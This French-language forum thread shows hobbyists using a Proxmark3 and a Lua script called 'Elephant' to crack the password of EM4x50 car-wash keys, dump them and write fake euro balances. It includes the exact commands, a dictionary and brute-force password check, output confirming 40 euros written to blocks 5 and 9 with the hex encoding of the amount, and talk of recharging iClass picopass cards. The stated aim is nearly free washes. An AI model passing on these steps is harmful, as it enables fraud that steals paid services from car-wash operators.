Clé de lavage bleue presque gratuit (lavage auto)

[25]

Bonjour, tu as quoi comme matos pm3 easy, rdv4 ? car moi j'ai pas de psswd avec cette key.
tu as fais lf em 4x50 -chk
il existe un brute force pour cette key

---

Il y a un fichier avec des passwd dans ./pm3/client/dictionnary t55xx_default_pwds.dic que tu peux lancer avec cette commande.
lf em 4x50 chk  -f t55_default_pwds.dic si ton passwd & dedans il va sortir sinon aprés lf em 4x50 brute --help

---

Maintenant je sais pas si la key est national comme Eurokey de 56 bits que j'ai eu avec un sniffer car pas le méme transpondeur, Eurokey "pcf7935", le proxmark3 ne gére pas cette key tu peux juste lire mais rien faire méme avec le pwd il faut un Gambit.
cette key ne fait que 32bits mais bon pas facile .

[15]

Merci fazer beh hier soir g lancé avec le script en boucle j'ai lancé cet commande LF em 4x50 login -p et j'ai testé les pass un par un et un moment avec un pass sa ma mit login ok

---

J'ai un proxmark3 easy

[25]

Bonjour, tu as lancé quel script Elephant de notre ami Abou ?
Car  la cmd est script run Elephant --help pour avoir le menu du script, ce script il faut le mettre dans pm3/client/dictionaries/lua script.
Donc si tu as récupéré le passwd maintenant tu vas pouvoir écrire dans cette key.

tu as quoi avec lf em 4x50 chk normalement si tu as un pwd tu devrais le voir.

---

Re, sinon si tu veux met moi ton dump que je vais injecté dans ma key et ensuite voir de plus près.
J'ai du temps je suis en retraite.

Bonne aprem.

[16]

Bonjour à tous, je suis nouveau sur le forum et je viens d’acquérir un Proxmark3 en + de l'acr,  je serais ravi de partager avec toi Fazer_59 car je vois que tu t'y connais pas mal et en plus tu es français!  c'est top! 
J'aurais des questions sur le rechargement d'une carte de lavage d'une autre marque avec une sécurité Iclass picopass je sais que nous pouvons la recharger car quelqu'un me l'a déjà fait, mais j'aimerais apprendre de moi même penses-tu que tu pourrais m'aider?
auquel cas je ferais un nouveau sujet ou bien pouvons nous discuter par télégramme ou autre?

Pour pas changer de sujet, je possède aussi une clé bleu, j'ai normalement bien enregistré le script comme tu l'a décrit, demain j’essaierais de le lire.
Avec l'antenne d'origine pense tu que c'est faisable car j'ai fait un test  comme décrit,voici mes valeurs :
+] At 125,00 kHz .......... 19,37 V
[+] At 134,83 kHz .......... 12,97 V
[+] At 115,38 kHz optimal... 25,45 V

Je te remercie.

[25]

Slt Badboydu13, pas de souci je peux regarder avec toi sur ce sujet.
Je connais pas trop iclass picopass mais cela peut être sympa.
Maintenant je vois que tu as un pm3 easy vu des tensions LF, as tu fais un upgrade de ton pm3.
Maintenant je sais pas trop, concernant la clé Elephant je pense pas que tu es un bon résultat avec ta tension LF,
maintenant essaye tu lances le script avec une 50 ou plus de boucles je te conseille de changer la position de ta key pour peut être une bonne position.
Je pense qu'il faudra que tu changes l'antenne avec le modèle plus haut pour avoir de meilleurs résultats.

---

Re, avec ton pm3 tu lances script list, tu devrais voir le script dans la list.
Ensuite / script run Elephant -h
 -- dump d'une cle
 script run Elephant -dump

 -- affichage de l'aide
 script run Elephant -h

-- credit de 50 euros
 script run Elephant -S 50

 -- recherche de badge LF
 script run Elephant -c

 -- scan en changeant la frequence LF de 100khz ├á 150khz
 script run Elephant -scan               # ici tu vas pouvoir scanner .

[16]

Slt Badboydu13, pas de souci je peux regarder avec toi sur ce sujet.
Je connais pas trop iclass picopass mais cela peut être sympa.
Maintenant je vois que tu as un pm3 easy vu des tensions LF, as tu fais un upgrade de ton pm3.
Maintenant je sais pas trop, concernant la clé Elephant je pense pas que tu es un bon résultat avec ta tension LF,
maintenant essaye tu lances le script avec une 50 ou plus de boucles je te conseille de changer la position de ta key pour peut être une bonne position.
Je pense qu'il faudra que tu changes l'antenne avec le modèle plus haut pour avoir de meilleurs résultats.

---

Re, avec ton pm3 tu lances script list, tu devrais voir le script dans la list.
Ensuite / script run Elephant -h
 -- dump d'une cle
 script run Elephant -dump

 -- affichage de l'aide
 script run Elephant -h

-- credit de 50 euros
 script run Elephant -S 50

 -- recherche de badge LF
 script run Elephant -c

 -- scan en changeant la frequence LF de 100khz ├á 150khz
 script run Elephant -scan               # ici tu vas pouvoir scanner .

  # | word (msb)  | word (lsb)  | desc
----+-------------+-------------+--------------------
  0 | 0F 7D 26 00 | 00 64 be f0 | password ( WO )
  1 | 00 00 00 00 | 00 00 00 00 | protection cfg ( locked )
  2 | 00 00 00 00 | 00 00 00 00 | control cfg ( locked )
  3 | 00 00 00 00 | 00 00 00 00 | user data
  4 | 00 00 00 00 | 00 00 00 00 | user data
  5 | 00 00 00 00 | 00 00 00 00 | user data
  6 | 00 00 00 00 | 00 00 00 00 | user data
  7 | 00 00 00 00 | 00 00 00 00 | user data
  8 | 00 00 00 00 | 00 00 00 00 | user data
  9 | 00 00 00 00 | 00 00 00 00 | user data
 10 | 00 00 00 00 | 00 00 00 00 | user data
 11 | 00 00 00 00 | 00 00 00 00 | user data
 12 | 00 00 00 00 | 00 00 00 00 | user data
 13 | 00 00 00 00 | 00 00 00 00 | user data
 14 | 00 00 00 00 | 00 00 00 00 | user data
 15 | 00 00 00 00 | 00 00 00 00 | user data
 16 | 00 00 00 00 | 00 00 00 00 | user data
 17 | 00 00 00 00 | 00 00 00 00 | user data
 18 | 00 00 00 00 | 00 00 00 00 | user data
 19 | 00 00 00 00 | 00 00 00 00 | user data
 20 | 00 00 00 00 | 00 00 00 00 | user data
 21 | 00 00 00 00 | 00 00 00 00 | user data
 22 | 00 00 00 00 | 00 00 00 00 | user data
 23 | 00 00 00 00 | 00 00 00 00 | user data
 24 | 00 00 00 00 | 00 00 00 00 | user data
 25 | 00 00 00 00 | 00 00 00 00 | user data
 26 | 00 00 00 00 | 00 00 00 00 | user data
 27 | 00 00 00 00 | 00 00 00 00 | user data
 28 | 00 00 00 00 | 00 00 00 00 | user data
 29 | 00 00 00 00 | 00 00 00 00 | user data
 30 | 00 00 00 00 | 00 00 00 00 | user data
 31 | 00 00 00 00 | 00 00 00 00 | user data
 32 | 00 00 00 00 | 00 00 00 00 | device serial number ( RO )
 33 | 00 00 00 00 | 00 00 00 00 | device identification ( RO )


voila mon dump je ne vois pas ou est écrit la somme? de plus il est impossible d'écrire ls 50 euro dessus "failled"
a quoi sert la fonction scan? j'ai pas bien compris

voici une autre commande pour le mdp

[usb] pm3 --> lf em 4x50 chk
[=] treating file as T55xx keys
[+] loaded 123 keys from dictionary file `/home/kali/proxmark3/client/dictionaries/t55xx_default_pwds.dic`
[=] You can cancel this operation by pressing the pm3 button
 ? Remaining keys: 123 
[+] found valid password [ 00000000 ]

un idée?

[25]

Bonjour, bon à priori pas de passwd dans ta key "00000000" , ensuite ton dump il y a rien pas bon que des 00.
Essaye avec une autre position, l'idée & de pouvoir capter ta key juste avec un LF search & ensuite lf em 4x50 dump.
Les € sont dans le block 5 & 9 .
Tu arrives pas a ecrire la somme ex: script run Elephant - S50 car tu es mal calé sur ton antenne LF.

Ton antenne LF est bien une V5 ?, as tu fais la derniére mise à jour de notre ami Iceman.

---

Re,
[usb] pm3 --> lf search

[=] Note: False Positives ARE possible
[=]
[=] Checking for known tags...
[=]
[!] Specify one authentication mode

[=]   # | word (msb)  | word (lsb)  | desc
[=] ----+-------------+-------------+--------------------
[=]  32 | 94 EE 8C C0 | 03 31 77 29 | device serial number ( RO )
[=] ----+-------------+-------------+--------------------
[=]  Serial: 94 EE 8C C0

[+] Valid EM4x50 ID found!
ensuite,
[usb] pm3 --> script run Elephant -S 40
[+] executing lua C:\ProxSpace\ProxSpace-master\pm3\proxmark3\client\luascripts/Elephant.lua
[+] args '-S 40'
   nombre de boucle?
1
ecriture de 40 euros sur bloc 5 et 9
bloc=00000190

[=]   # | word (msb)  | word (lsb)  | desc
[=] ----+-------------+-------------+--------------------
[=]   5 | 09 80 00 00 | 00 00 01 90 | user data
[=] ----+-------------+-------------+--------------------
[+] Write ( ok )
[?] Try `lf em 4x50 rdbl -a 5` - to read your data
[=] Done!

[=]   # | word (msb)  | word (lsb)  | desc
[=] ----+-------------+-------------+--------------------
[=]   9 | 09 80 00 00 | 00 00 01 90 | user data
[=] ----+-------------+-------------+--------------------
[+] Write ( ok )
[?] Try `lf em 4x50 rdbl -a 9` - to read your data
[=] Done!

[+] finished Elephant
quand tu écris tu dois avoir ceci ecriture blk5 & blk 9.

[=]   5 | 09 80 00 00 | 00 00 01 90 | user data ici 0190
[=]   6 | 80 18 80 00 | 00 01 18 01 | user data
[=]   7 | 55 AA 00 70 | 0e 00 55 aa | user data
[=]   8 | 70 80 18 00 | 00 18 01 0e | user data
[=]   9 | 09 80 00 00 | 00 00 01 90 | user data ici 0190en hex = 400 dec  donc 40€
[=]  10 | 80 18 80 00 | 00 01 18 01 | user data
[=]  11 | 70 80 18 00 | 00 18 01 0e | user data
[=]  12 | CA B3 55 18 | 18 aa cd 53 | user data
[=]  13 | 34 58 00 00 | 00 00 1a 2c | user data
[=]  14 | 70 80 18 00 | 00 18 01 0e | user data

[16]

Bonjour merci beaucoup pour ta réponse, mais je pense qu'il m'affiche que des 0 cause de l'antenne, j'ai essayé plusieurs fois hier et c'est jamais la même chose, sur plusieurs tentatives il m'a trouvé qu'une fois la clé avec son numéro de série.
J'ai regarder sur le site l antenne mais elle n est plus e stock?
Mon antenne est bien une V5 j'ai bien le proxmark 3 easy avec la dernière version de flashée

Par contre vous dites qu'il me demande à chaque opération le nombre de boucles or il est écrit "nombre de boucles?" Mais je ne peu rien ecrire, ça continu seul , faut il écrire quelque part dans le scipt le nombre de boucle ?

Merci pour l exemple d écriture ça me permet de voir la suite quand ça marche ...!